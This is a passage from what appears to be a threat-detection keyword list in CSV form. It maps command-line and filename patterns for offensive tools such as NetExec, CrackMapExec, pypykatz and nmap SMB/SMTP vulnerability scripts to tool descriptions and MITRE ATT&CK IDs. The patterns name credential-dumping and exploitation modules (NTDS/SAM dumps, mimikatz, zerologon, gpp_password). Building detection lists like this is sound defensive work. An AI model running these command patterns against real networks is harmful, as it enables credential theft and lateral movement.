Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* smb * -M ntlmv1 *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* smb * -M rdp -o ACTION=enable*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -M runasppl*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -M zerologon*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * --ntds --log *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* smb * --sam --log *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* smb * -u * -p * * -M dfscoerce*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -u * -p * * --rid-brute*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -u * -p * * --shares --filter-shares *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -u * -p * * -X whoami --obfs*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -u * -p * -M enum_av*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -u * -p * -M enum_dns*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -u * -p * -M gpp_password*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -u * -p * -M met_inject *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -"* smb * -u * -p * --wmi ""select Name from win32_computersystem""*",offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb client * shares *use c$*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* smb -M mimikatz --options*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* smb shareenum *smb2+ntlm-password*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* smb* -u '' -p ''*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* smb2-capabilities.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb2-security-mode.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb2-time.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb2-vuln-uptime.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-cmds.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -* smb-double-pulsar-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-enum-domains.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-enum-groups.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-enum-processes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-enum-services.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-enum-sessions.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-enum-shares.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smbexec.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* smb-flood.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-mbenum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-os-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-print-text.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-protocols.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-psexec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-security-mode.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-server-stats.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smbsr.db*,offensive_tool_keyword,SMBSR,Lookup for interesting stuff in SMB shares,T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Reconnaissance,https://github.com/oldboy21/SMBSR,1,0,N/A,N/A,2,138,24,2023-06-16T14:35:30Z,2021-11-10T16:55:52Z -* smbsr.log*,offensive_tool_keyword,SMBSR,Lookup for interesting stuff in SMB shares,T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Reconnaissance,https://github.com/oldboy21/SMBSR,1,0,N/A,N/A,2,138,24,2023-06-16T14:35:30Z,2021-11-10T16:55:52Z -* smb-system-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-conficker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-cve2009-3103.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-cve-2017-7494.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-ms06-025.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-ms07-029.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-ms08-067.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-ms10-054.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-ms10-061.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-ms17-010.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-regsvc-dos.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-vuln-webexec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smb-webexec-exploit.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-commands.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-log4shell.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* smtp-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-open-relay.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-strangeport.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-vuln-cve2010-4344.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-vuln-cve2011-1720.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-vuln-cve2011-1764.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* smtp-vuln-cve2020-28017-through-28026-21nails.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security 